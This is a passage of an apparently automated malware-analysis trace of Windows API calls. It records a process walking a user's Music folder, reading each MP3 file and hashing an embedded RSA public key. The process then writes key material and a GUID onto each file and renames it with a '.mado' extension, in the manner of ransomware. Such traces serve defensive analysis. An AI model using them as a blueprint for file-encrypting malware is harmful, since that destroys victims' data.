lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.670] CloseHandle (hObject=0x63c) returned 1 [0204.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.671] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Sbt0zxWRYObY0T.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbt0zxwryoby0t.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Sbt0zxWRYObY0T.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbt0zxwryoby0t.mp3.mado")) returned 1 [0204.674] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46034970, ftCreationTime.dwHighDateTime=0x1d5da5a, ftLastAccessTime.dwLowDateTime=0x2dd71ac0, ftLastAccessTime.dwHighDateTime=0x1d5dc94, ftLastWriteTime.dwLowDateTime=0x2dd71ac0, ftLastWriteTime.dwHighDateTime=0x1d5dc94, nFileSizeHigh=0x0, nFileSizeLow=0x2c2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TBZjJjm8Supb.mp3", cAlternateFileName="TBZJJJ~1.MP3")) returned 1 [0204.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.674] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TBZjJjm8Supb.mp3") returned=".mp3" [0204.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TBZjJjm8Supb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tbzjjjm8supb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.675] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=11310) returned 1 [0204.675] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.677] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2c08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.677] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.679] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.679] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x2c2e, lpOverlapped=0x0) returned 1 [0204.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.680] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.681] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.681] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.681] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.681] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.681] GetLastError () returned 0x0 [0204.681] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.681] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.681] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.681] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.681] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c30) returned 0x3b74b68 [0204.682] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80b28 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80b70 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3d0 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.682] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b777a0 [0204.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe400 | out: hHeap=0x2c0000) returned 1 [0204.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b777a0 | out: hHeap=0x2c0000) returned 1 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe418 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe400 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b683c0 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68078 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe400 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.683] GetCurrentThreadId () returned 0x600 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72200 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.683] GetCurrentThreadId () returned 0x600 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe430 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.685] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2c2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.685] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.686] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.686] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.686] CloseHandle (hObject=0x63c) returned 1 [0204.686] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TBZjJjm8Supb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tbzjjjm8supb.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TBZjJjm8Supb.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tbzjjjm8supb.mp3.mado")) returned 1 [0204.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.687] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.688] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe554bd60, ftCreationTime.dwHighDateTime=0x1d5e509, ftLastAccessTime.dwLowDateTime=0xdf434c50, ftLastAccessTime.dwHighDateTime=0x1d5e641, ftLastWriteTime.dwLowDateTime=0xdf434c50, ftLastWriteTime.dwHighDateTime=0x1d5e641, nFileSizeHigh=0x0, nFileSizeLow=0x17cf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TC y_9-Zb7kJ.mp3", cAlternateFileName="TCY_9-~1.MP3")) returned 1 [0204.688] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TC y_9-Zb7kJ.mp3") returned=".mp3" [0204.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TC y_9-Zb7kJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tc y_9-zb7kj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.689] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=97528) returned 1 [0204.689] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.691] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17cd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.691] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.693] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x17cf8, lpOverlapped=0x0) returned 1 [0204.693] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.694] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.694] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.694] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.694] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.694] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.695] GetLastError () returned 0x0 [0204.695] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.695] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: 